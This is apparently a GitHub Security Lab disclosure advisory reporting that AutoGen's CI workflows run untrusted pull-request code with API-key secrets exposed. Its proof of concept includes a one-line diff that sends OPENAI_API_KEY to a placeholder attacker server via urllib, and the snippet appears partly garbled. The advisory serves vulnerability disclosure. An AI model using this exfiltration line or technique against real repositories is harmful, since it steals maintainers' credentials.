Coordinated Disclosure Timeline

Summary

Several GitHub workflow may leak secret API Keys (OpenAI, Azure, Bing, etc.) when triggered by any Pull Request.

Project

AutoGen

Tested Version

v0.2.15

Details

Issue 1: Untrusted checkout leading to secrets exfiltration from a Pull Request in contrib-openai.yml (GHSL-2024-025)

The pull_request_target trigger event used in contrib-openai.yml GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.

name: OpenAI4ContribTests

on:
  pull_request_target:
    branches: ['main']
    paths:
      - 'autogen/**'
      - 'test/agentchat/contrib/**'
      - '.github/workflows/contrib-openai.yml'
      - 'setup.py'
permissions: {}
...
RetrieveChatTest:
...
    steps:
      # checkout to pr branch
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
...
      - name: Coverage
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          coverage run -a -m pytest test/agentchat/contrib/test_retrievechat.py test/agentchat/contrib/test_qdrant_retrievechat.py
          coverage xml

By explicitly checking out and running a test script from a fork, the untrusted code is running in an environment that is able to access secrets. See Preventing pwn requests for more information.

An attacker could create a pull request with a malicious test/agentchat/contrib/test_qdrant_retrievechat.py which would get access to the secrets stored in the the environmental variables (eg: OPENAI_API_KEY, AZURE_OPENAI_API_KEY, BING_API_KEY, etc. ).

Note, that in addition to the RetrieveChatTest.Coverage step, there are other steps in the same workflow which are also vulnerable so secret exfiltration:

This vulnerability was found using the Checkout of untrusted code in trusted context CodeQL query.

Proof Of Concept (PoC)

To verify the vulnerability follow the following steps:

Impact

Even though the workflow runs with no write permissions and therefore, it does not allow for unauthorized modification of the base repository, it allows an attacker to exfiltrate any secrets available to the script.

Issue 2: Untrusted checkout leading to secrets exfiltration from a Pull Request in openai.yml (GHSL-2024-026)

Similarly, the pull_request_target trigger event used in openai.yml GitHub workflow explicitly checks out potentially untrusted code from a pull request and runs it.

name: OpenAI

on:
  pull_request_target:
    branches: ["main"]
    paths:
      - "autogen/**"
      - "test/**"
      - "notebook/agentchat_auto_feedback_from_code_execution.ipynb"
      - "notebook/agentchat_function_call.ipynb"
      - "notebook/agentchat_groupchat_finite_state_machine.ipynb"
      - ".github/workflows/openai.yml"
permissions: {}
...
test:
...
    steps:
      # checkout to pr branch
      - name: Checkout
        uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
...
      - name: Coverage
        if: matrix.python-version == '3.9'
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          coverage run -a -m pytest test --ignore=test/agentchat/contrib
          coverage xml
      - name: Coverage and check notebook outputs
        if: matrix.python-version != '3.9'
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          AZURE_OPENAI_API_KEY: ${{ secrets.AZURE_OPENAI_API_KEY }}
          AZURE_OPENAI_API_BASE: ${{ secrets.AZURE_OPENAI_API_BASE }}
          WOLFRAM_ALPHA_APPID: ${{ secrets.WOLFRAM_ALPHA_APPID }}
          OAI_CONFIG_LIST: ${{ secrets.OAI_CONFIG_LIST }}
        run: |
          pip install nbconvert nbformat ipykernel
          coverage run -a -m pytest test/test_notebook.py
          coverage xml
          cat "$(pwd)/test/executed_openai_notebook_output.txt"

By explicitly checking out and running a test script from a fork, the untrusted code is running in an environment that is able to access secrets. See Preventing pwn requests for more information.

An attacker could create a pull request with a malicious python script in the test/ directory which would get access to the secrets stored in the the environmental variables (eg: OPENAI_API_KEY, AZURE_OPENAI_API_KEY ).

This vulnerability was found using the Checkout of untrusted code in trusted context CodeQL query.

Proof Of Concept (PoC)

To verify the vulnerability follow the following steps:

+urllib.request.urlopen(f”https://YOUR-CONTROLLED-SERVER?{os.environ[‘OPENAI_API_KEY’]}”)^M +^M try: import openai except ImportError: ```

Impact

Even though the workflow runs with no write permissions and therefore, it does not allow for unauthorized modification of the base repository, it allows an attacker to exfiltrate any secrets available to the script.

Credit

These issues were discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-025 or GHSL-2024-026 in any communication regarding these issues.